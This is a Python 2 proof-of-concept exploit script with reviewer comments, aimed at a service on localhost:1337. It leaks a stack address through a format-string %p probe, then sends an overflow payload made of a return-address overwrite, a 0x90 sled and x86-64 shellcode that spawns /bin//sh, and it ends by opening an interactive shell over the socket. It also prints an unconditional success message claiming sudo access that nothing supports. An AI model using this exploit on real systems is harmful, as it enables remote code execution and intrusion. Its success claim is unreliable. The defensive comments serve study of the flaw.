- ```import struct
- import socket
- import os
- # Proof-of-concept client aimed at a service on localhost:1337.
- # Python 2 only: it calls raw_input and treats str as a byte string.
- # Stage 1 sends printf-style %p specifiers and parses an address from the reply.
- # Stage 2 sends one long input that embeds a pointer computed from that address.
- # NOTE(review): this presumably relies on the service using client input as a
- # format string and copying it into a fixed-size stack buffer unchecked; the
- # server code is not in this paste, so confirm against the target.
- # Defensive takeaways if so: pass a constant format string, bound every copy
- # into the buffer, and build with stack protector, non-executable stack and PIE/ASLR.
- # connection details
- # // host = 'localhost'
- # //port = '1337'
- s = socket.socket()
- s.connect(('localhost', 1337))
- # Read whatever the service sends first (up to 1024 bytes).
- r = s.recv(1024)
- # Three %p specifiers: a service that formats this input echoes pointer values back.
- s.send("%p,%p,%p\n")
- # Keep reading until a reply containing a comma arrives.
- # NOTE(review): the next line is presumably the loop body; indentation was lost in this paste.
- while ',' not in r:
- r = s.recv(1024)
- # Second comma-separated field, parsed as hex, minus 9, is taken as the buffer start.
- # The 9 is a target-specific offset that cannot be verified from this paste.
- start_buf = int(r.split(',')[1], 16)-9
- # Cosmetic: clears the local terminal before printing the banner.
- os.system("clear")
- print("parad0x shellcode exploit :) \n19/02/2020\n")
- print("start of buffer leak: 0x{:08x}\n".format(start_buf))
- print("Running on {localhost:1337}\n")
- # Pauses until the operator presses enter.
- raw_input('exploit is ready (press enter 2x)\n')
- # Filler of ASCII '0' characters placed in front of the packed pointer.
- padding = "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
- # 0xcc is the x86 int3 breakpoint opcode; presumably a debugging stand-in.
- #shellcode = "\xcc"*64
- # Machine-code bytes; they include the ASCII string /bin//sh and end with
- # 0x0f 0x05, the x86-64 syscall instruction.
- shellcode = "\x90\x6a\x42\x58\xfe\xc4\x48\x99\x52\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5e\x49\x89\xd0\x49\x89\xd2\x0f\x05"
- # 8-byte unsigned value in native byte order: leaked start + padding length + 8 + 10,
- # i.e. an address 10 bytes into the 0x90 run that follows the pointer in the payload.
- # A non-executable stack would stop execution at that address.
- RIP = struct.pack("Q", (start_buf+len(padding)+8)+10)
- # Wire layout: '0' filler, packed pointer, 64 bytes of 0x90, then the byte string above.
- # For detection: a long run of one filler byte followed by a 0x90 run is a
- # recognisable pattern for network IDS rules.
- payload = padding + RIP + "\x90"*64 + shellcode
- s.send(payload)
- print('\n')
- # Printed unconditionally: nothing above checks how the service responded,
- # and nothing in this script supports the sudo claim.
- print("Exploit Succeeded! You can run SUDO commands here")
- from telnetlib import Telnet
- # Hand the existing socket to Telnet so interact() relays keyboard input to
- # the service and prints what it sends back.
- t = Telnet()
- t.sock = s
- t.interact()
- # Reached only after interact() returns.
- s.close()```